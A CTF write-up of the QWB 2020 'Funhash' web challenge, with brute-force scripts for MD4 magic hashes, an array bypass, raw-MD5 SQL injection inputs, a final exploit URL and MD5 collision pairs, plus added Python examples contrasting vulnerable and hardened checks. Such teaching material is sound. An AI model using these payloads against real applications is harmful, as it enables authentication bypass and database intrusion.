强网杯 (QWB) 2020 Writeup | iluem'Blog

强网杯 (QWB) 2020 Writeup

Published: 2020-08-23 Category: Web

Web

Funhash

Nothing in this challenge is new knowledge; a quick Google search turns all of it up. I am mainly writing it down so it is easy to find the next time it is needed.

<?php
include 'conn.php';
highlight_file("index.php");
//level 1
if ($_GET["hash1"] != hash("md4", $_GET["hash1"]))
{
    die('level 1 failed');
}

//level 2
if($_GET['hash2'] === $_GET['hash3'] || md5($_GET['hash2']) !== md5($_GET['hash3']))
{
    die('level 2 failed');
}

//level 3
$query = "SELECT * FROM flag WHERE password = '" . md5($_GET["hash4"],true) . "'";
$result = $mysqli->query($query);
$row = $result->fetch_assoc(); 
var_dump($row);
$result->free();
$mysqli->close();

?>

Level 1 appears to come from a foreign competition, HSCTF 6.

Brute-force script:

<?php
// Brute-force a "magic" MD4 input: a numeric string 0e<digits> whose MD4 hex
// digest is itself 0e<digits>, so PHP's loose == treats both as the float 0.0.
for ($i = 1; $i < 1000000000; $i++) {
    if ('0e' . $i == hash("md4", '0e' . $i)) {
        print_r('Get it : 0e' . $i);
        break;
    }
    if ($i % 1000000 == 0)
        echo '.';
}
Any value whose digest starts with 0e (followed only by digits) works; the first one found is 0e251288019, the second is 0e688801293.

An expert's script:

import hashlib
import re

try:
    from Crypto.Hash import MD4  # pycryptodome fallback: OpenSSL 3 ships MD4 only as a legacy algorithm
except ImportError:
    MD4 = None

prefix = '0e'

def md4_hex(data):
    # Use OpenSSL's MD4 through hashlib when available, otherwise pycryptodome
    try:
        return hashlib.new('md4', data).hexdigest()
    except ValueError:
        if MD4 is None:
            raise
        return MD4.new(data).hexdigest()

def breakit():
    iters = 0
    while 1:
        s = (prefix + str(iters)).encode('utf-8')
        hashed_s = md4_hex(s)
        iters = iters + 1
        # 32 hex characters: "0e" followed by 30 digits is a numeric string equal to 0.0
        r = re.match('^0e[0-9]{30}$', hashed_s)
        if r:
            print("[+] found! md4( {} ) ---> {}".format(s, hashed_s))
            print("[+] in {} iterations".format(iters))
            return
        if iters % 1000000 == 0:
            print("[+] current value: {}       {} iterations, continue...".format(s, iters))

breakit()
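Why the level 1 check can be passed at all, as an added Python example that is not from the original post or the challenge: a model of PHP's `==` rule for two numeric strings, applied to a constructed MD5 case rather than the challenge's MD4 so that it runs without the legacy MD4 provider. The names `is_numeric_string`, `php_loose_equals`, `vulnerable_level1_check` and `hardened_level1_check` are my own; the hardened form is what `!==` or `hash_equals()` gives in PHP.

```python
import hashlib
import hmac
import re

# Shape of a PHP numeric string: optional whitespace, sign, integer or decimal
# part, optional exponent. PHP compares two numeric strings with == as numbers,
# which is the rule that makes any two "0e<digits>" strings equal (both are 0.0).
_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")


def is_numeric_string(s: str) -> bool:
    return _NUMERIC.match(s) is not None


def php_loose_equals(a: str, b: str) -> bool:
    """Model of PHP's == on two strings: numeric strings compare as numbers,
    everything else compares byte for byte."""
    if is_numeric_string(a) and is_numeric_string(b):
        return float(a) == float(b)
    return a == b


def vulnerable_level1_check(value: str, digest: str) -> bool:
    """The challenge's check: `$x != hash(...)` passes whenever == says equal."""
    return php_loose_equals(value, digest)


def hardened_level1_check(value: str, digest: str) -> bool:
    """Strict, constant-time comparison (PHP's !== or hash_equals()).
    Numeric-looking strings get no special treatment here."""
    return hmac.compare_digest(value.encode(), digest.encode())


# Constructed demonstration value: md5("0e215962017") is itself of the form
# 0e<30 digits>, the MD5 counterpart of the MD4 values found above.
MAGIC = "0e215962017"


def demo() -> dict:
    digest = hashlib.md5(MAGIC.encode()).hexdigest()
    return {
        "digest": digest,
        "both_numeric": is_numeric_string(MAGIC) and is_numeric_string(digest),
        "loose_equal": vulnerable_level1_check(MAGIC, digest),   # True: 0.0 == 0.0
        "strict_equal": hardened_level1_check(MAGIC, digest),   # False: different strings
    }


if __name__ == "__main__":
    for key, val in demo().items():
        print(f"{key}: {val}")
```

The fix is the comparison operator, not the hash function: switching MD4 for SHA-256 would still leave `!=` comparing numeric strings as floats, while `!==` (or `hash_equals()`, which also avoids timing leaks) compares the bytes.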

Level 2 has been done to death; an array bypass is enough.

Level 3 is also old; it was set as a challenge as early as 2010.


Brute-force script:

<?php
// Search for integers whose raw (binary) MD5 contains the byte sequence 'or':
// a quote, the letters o r, and another quote. Spliced into the query, that
// closes the string literal and adds an OR condition. Runs until interrupted.
for ($i = 0;;) {
    for ($c = 0; $c < 1000000; $c++, $i++)
        if (stripos(md5($i, true), '\'or\'') !== false)
            echo "\nmd5($i) = " . md5($i, true) . "\n";
    echo ".";
}
?>

Two usable values (content is the input, hex and raw are its MD5 digest, string is the printable part of the raw digest):

content: 129581926211651571912466741651878684928
hex: 06da5430449f8f6f23dfc1276f722738
raw: \x06\xdaT0D\x9f\x8fo#\xdf\xc1'or'8
string: T0Do#'or'8

content: ffifdyop
hex: 276f722736c95d99e921722cf9ed621c
raw: 'or'6\xc9]\x99\xe9!r,\xf9\xedb\x1c
string: 'or'6]!r,b

Final payload:

?hash1=0e688801293&hash2[]=1&hash3[]=&hash4=129581926211651571912466741651878684928
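The level 3 injection and its fix, as an added Python example that is not part of the original post: sqlite3 stands in for the challenge's MySQL (both treat a string with a leading digit as true in a boolean context), the `flag` table and its single row are constructed, and the two values recorded above are used as input. `vulnerable_query` splices the raw digest into the query exactly like the challenge source; `safe_query` binds it as a parameter; `contains_quote_or` is a small detection helper for the pattern the brute-force script searches for.

```python
import hashlib
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the challenge's `flag` table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE flag (id INTEGER PRIMARY KEY, password TEXT, flag TEXT)")
    conn.execute("INSERT INTO flag (password, flag) VALUES (?, ?)",
                 ("not-the-digest-of-anything-guessable", "flag{constructed}"))
    conn.commit()
    return conn


def raw_md5_as_text(value: str) -> str:
    """PHP's md5($x, true) returns 16 raw bytes and PHP strings are byte strings,
    so the bytes land in the query verbatim. Latin-1 maps each byte to one
    character, which reproduces that behaviour in Python."""
    return hashlib.md5(value.encode()).digest().decode("latin-1")


def vulnerable_query(conn: sqlite3.Connection, hash4: str) -> list:
    # String concatenation, as in the challenge. A digest containing 'or'
    # turns the WHERE clause into  password = '<bytes>' or '<digit...>'.
    query = "SELECT * FROM flag WHERE password = '" + raw_md5_as_text(hash4) + "'"
    return conn.execute(query).fetchall()


def safe_query(conn: sqlite3.Connection, hash4: str) -> list:
    # Parameterised: the digest is bound as data and never parsed as SQL,
    # whatever bytes it happens to contain.
    return conn.execute("SELECT * FROM flag WHERE password = ?",
                        (raw_md5_as_text(hash4),)).fetchall()


def contains_quote_or(hash4: str) -> bool:
    """Detection helper: does the raw digest of this input carry 'or'?"""
    return "'or'" in raw_md5_as_text(hash4).lower()


if __name__ == "__main__":
    db = make_db()
    for value in ("129581926211651571912466741651878684928", "ffifdyop", "hello"):
        print(value, "->", repr(raw_md5_as_text(value)))
        print("  vulnerable:", vulnerable_query(db, value))
        print("  safe:      ", safe_query(db, value))
```

Escaping the digest (for example with `mysqli_real_escape_string`) would also stop this particular payload, but binding the value as a parameter removes the whole class of problem; using the hex form `md5($x)` instead of the raw form only avoids the quote character by accident.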

In addition, some MD5 strong-collision values are recorded here.


For checks of this type, where the inputs are cast to string before being compared, the array bypass no longer works, because an array forced to a string becomes the literal "Array":

php > var_dump((string)([]));
string(5) "Array"

A few usable values:

a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

a=%D11%DD%02%C5%E6%EE%C4i%3D%9A%06%98%AF%F9%5C/%CA%B5%87%12F%7E%AB%40%04X%3E%B8%FB%7F%89U%AD4%06%09%F4%B3%02%83%E4%88%83%25qAZ%08Q%25%E8%F7%CD%C9%9F%D9%1D%BD%F2%807%3C%5B%D8%82%3E1V4%8F%5B%AEm%AC%D46%C9%19%C6%DDS%E2%B4%87%DA%03%FD%029c%06%D2H%CD%A0%E9%9F3B%0FW%7E%E8%CET%B6p%80%A8%0D%1E%C6%98%21%BC%B6%A8%83%93%96%F9e%2Bo%F7%2Ap&b=%D11%DD%02%C5%E6%EE%C4i%3D%9A%06%98%AF%F9%5C/%CA%B5%07%12F%7E%AB%40%04X%3E%B8%FB%7F%89U%AD4%06%09%F4%B3%02%83%E4%88%83%25%F1AZ%08Q%25%E8%F7%CD%C9%9F%D9%1D%BDr%807%3C%5B%D8%82%3E1V4%8F%5B%AEm%AC%D46%C9%19%C6%DDS%E24%87%DA%03%FD%029c%06%D2H%CD%A0%E9%9F3B%0FW%7E%E8%CET%B6p%80%28%0D%1E%C6%98%21%BC%B6%A8%83%93%96%F9e%ABo%F7%2Ap

a=%3C%3Fphp%0A%0A%24space%20%3D%20%22AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%22%3B%0Aif%20%28%27%FDG.%05%C9%ED%14%EE-%17%29%19%98%EE%D0%FF%F2%AA%01%01%2B%D3B%A9%1B%D68%85%EC%15%B2%E1A%BD%C6%C7P%AD%3B%22%8F%FEP%1B%C8%F9ZU%9C5%85%24q%024F%DF1%17c%D0-%C5%8FC%FFS%0A%D4%3Bcr%FB%21%9D%9A%1F%DE%5B%F6%0DP3%C8%95%CCJ%0D%02%E9e%D7MIM%FE%B5%BF%7E%F2%8F2%EC%85%3A%A8%5Db%91%F0%B2%5C%F6%8C/5%95%BF%C3%1C%5E%DBgn%7E3D7%27%20%3D%3D%20%27%FDG.%05%C9%ED%14%EE-%17%29%19%98%EE%D0%FF%F2%AA%01%01%2B%D3B%A9%1B%D68%85%EC%15%B2%E1A%BD%C6%C7P%AD%3B%22%8F%FEP%1B%C8%F9ZU%9C5%85%24q%024F%DF1%17c%D0-%C5%8FC%FFS%0A%D4%3Bcr%FB%21%9D%9A%1F%DE%5B%F6%0DP3%C8%95%CCJ%0D%02%E9e%D7MIM%FE%B5%BF%7E%F2%8F2%EC%85%3A%A8%5Db%91%F0%B2%5C%F6%8C/5%95%BF%C3%1C%5E%DBgn%7E3D7%27%20%29%20%7B%0A%20%20%20%20echo%20%27Behaviour%20A%27%2CPHP_EOL%3B%0A%7D%20else%20%7B%0A%20%20%20%20echo%20%27Behaviour%20B%27%2CPHP_EOL%3B%0A%7D&b=%3C%3Fphp%0A%0A%24space%20%3D%20%22AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%22%3B%0Aif%20%28%27%FDG.%05%C9%ED%14%EE-%17%29%19%98%EE%D0%FF%F2%AA%01%81%2B%D3B%A9%1B%D68%85%EC%15%B2%E1A%BD%C6%C7P%AD%3B%22%8F%FEP%1B%C8y%5BU%9C5%85%24q%024F%DF1%17%E3%D0-%C5%8FC%FFS%0A%D4%3Bcr%FB%21%9D%9A%1F%DE%5B%F6%0DP3H%95%CCJ%0D%02%E9e%D7MIM%FE%B5%BF%7E%F2%8F2%EC%85%3A%A8%5Db%91p%B2%5C%F6%8C/5%95%BF%C3%1C%5E%DBg%EE%7E3D7%27%20%3D%3D%20%27%FDG.%05%C9%ED%14%EE-%17%29%19%98%EE%D0%FF%F2%AA%01%01%2B%D3B%A9%1B%D68%85%EC%15%B2%E1A%BD%C6%C7P%AD%3B%22%8F%FEP%1B%C8%F9ZU%9C5%85%24q%024F%DF1%17c%D0-%C5%8FC%FFS%0A%D4%3Bcr%FB%21%9D%9A%1F%DE%5B%F6%0DP3%C8%95%CCJ%0D%02%E9e%D7MIM%FE%B5%BF%7E%F2%8F2%EC%85%3A%A8%5Db%91%F0%B2%5C%F6%8C/5%95%BF%C3%1C%5E%DBgn%7E3D7%27%20%29%20%7B%0A%20%20%20%20echo%20%27Behaviour%20A%27%2CPHP_EOL%3B%0A%7D%20else%20%7B%0A%20%20%20%20echo%20%27Behaviour%20B%27%2CPHP_EOL%3B%0A%7D
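Checking the first pair above, as an added Python example that is not from the original post: the a/b values are decoded from the query string exactly as given, then the code confirms that they differ, that they share an MD5 digest, and that SHA-256 separates them. `vulnerable_collision_check` is an assumed shape of the string-cast check the post refers to (cast both inputs to string, require them to differ, require equal MD5); the "Array" behaviour follows the `var_dump` output above. All function names are my own.

```python
import hashlib
from urllib.parse import unquote_to_bytes

# The first a/b pair from the post, kept URL-encoded exactly as it would arrive
# in a query string (64 bytes each).
PAIR = ("a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95"
        "%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2"
        "&b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95"
        "%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2")


def parse_pair(query: str) -> dict:
    """Decode a=...&b=... into raw bytes. unquote_to_bytes is used rather than
    parse_qs because the values are binary and '+' must stay a literal plus."""
    out = {}
    for field in query.split("&"):
        name, _, value = field.partition("=")
        out[name] = unquote_to_bytes(value)
    return out


def php_string_cast(value) -> bytes:
    """Model of PHP's (string) cast for the two shapes the post discusses:
    a string stays itself, an array becomes the literal "Array"."""
    return b"Array" if isinstance(value, list) else value


def vulnerable_collision_check(a, b) -> bool:
    """Assumed shape of the check in the post's screenshot: cast to string,
    require the strings to differ, then require identical MD5 digests."""
    sa, sb = php_string_cast(a), php_string_cast(b)
    return sa != sb and hashlib.md5(sa).digest() == hashlib.md5(sb).digest()


def hardened_collision_check(a, b) -> bool:
    """Same logic with SHA-256, for which no such pair is known."""
    sa, sb = php_string_cast(a), php_string_cast(b)
    return sa != sb and hashlib.sha256(sa).digest() == hashlib.sha256(sb).digest()


def differing_offsets(a: bytes, b: bytes) -> list:
    """Byte positions where the two inputs differ (two for this pair)."""
    return [i for i, (x, y) in enumerate(zip(a, b)) if x != y]


if __name__ == "__main__":
    p = parse_pair(PAIR)
    print("a md5:", hashlib.md5(p["a"]).hexdigest())
    print("b md5:", hashlib.md5(p["b"]).hexdigest())
    print("differs at byte offsets:", differing_offsets(p["a"], p["b"]))
    print("md5 check passes:", vulnerable_collision_check(p["a"], p["b"]))
    print("sha256 check passes:", hardened_collision_check(p["a"], p["b"]))
    print("arrays pass md5 check:", vulnerable_collision_check([], []))
```

The string cast closes the `md5(array)` trick, but leaves the real weakness in place: MD5 collisions are cheap to produce, so "different inputs, same MD5" is an achievable condition rather than a contradiction. A check that needs collision resistance should use SHA-256 or stronger.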